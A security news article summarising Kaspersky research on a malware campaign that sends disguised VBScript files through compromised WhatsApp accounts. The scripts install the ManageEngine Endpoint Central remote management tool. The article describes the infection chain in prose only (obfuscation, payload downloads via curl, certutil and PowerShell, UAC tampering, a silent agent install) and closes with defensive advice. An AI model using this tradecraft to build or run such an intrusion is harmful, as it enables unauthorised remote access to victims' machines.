Kaspersky researchers have uncovered an ongoing malware campaign that uses compromised WhatsApp accounts to distribute malicious VBScript attachments.
The attachments install ManageEngine Endpoint Central, a legitimate remote management tool that can provide attackers with remote access to infected systems. The campaign has affected users in multiple countries, with Malaysia accounting for approximately 80% of observed infections.
Kaspersky found that compromised WhatsApp accounts were sending malicious attachments to contacts without accompanying messages, indicating that attackers were leveraging trusted relationships to increase the likelihood of execution. The method used to compromise the accounts remains unknown.
The malicious files are disguised as business and financial documents, using names such as “Financial Reports.vbs,” “Account Statement.vbs,” and “Outstanding Payment List.vbs.” Kaspersky also observed localized variants in Portuguese, French, German, and Malay, suggesting a broad international targeting effort.
Kaspersky
The campaign primarily targets WhatsApp Desktop and WhatsApp Web users. Infection requires user interaction, where recipients must download the attachment and then open it. Once executed, the VBScript launches through Windows Script Host (WScript.exe), creates hidden directories under C:\Users\Public\Documents\, and downloads additional payloads from attacker-controlled infrastructure.
Kaspersky observed extensive obfuscation techniques, including encoded scripts, randomized variable names, junk code, and string reconstruction. Some variants also abuse legitimate Windows utilities such as curl.exe, bitsadmin.exe, certutil.exe, and PowerShell to retrieve additional payloads.
The second stage consists of two VBScript files. One repeatedly attempts to modify the Windows User Account Control (UAC) setting, ConsentPromptBehaviorAdmin, which can reduce prompts for administrative actions if the user grants elevated privileges. The other downloads and extracts a ZIP archive containing the next-stage payload.
The final payload installs ManageEngine Endpoint Central, a legitimate enterprise endpoint management platform used for software deployment, remote support, and system administration. The archive contains the Endpoint Central agent installer (UEMSAgent.msi), certificates, configuration files, and a malicious launcher script (setup1.vbs) that silently installs the agent using msiexec.exe.
Kaspersky
Analysis of the embedded DCAgentServerInfo.json file revealed several management servers, including one IP address previously linked to ValleyRAT and Gh0st RAT infrastructure. However, Kaspersky said the evidence is insufficient to attribute the activity to a known threat actor.
The campaign has been observed targeting users in Malaysia, Brazil, India, Mexico, Singapore, the United Kingdom, Spain, Taiwan, Australia, Russia, and Vietnam. While Kaspersky found multiple VBScript samples containing simplified Chinese comments and notes, the company only assesses with low confidence that the operation is being conducted by a Chinese-speaking actor.
WhatsApp users should avoid opening script files received through messaging apps, even when they come from known contacts. Unexpected documents should be verified through a separate channel, and organizations should monitor for unauthorized installations of remote management software, including Endpoint Central agents.
Leave a Reply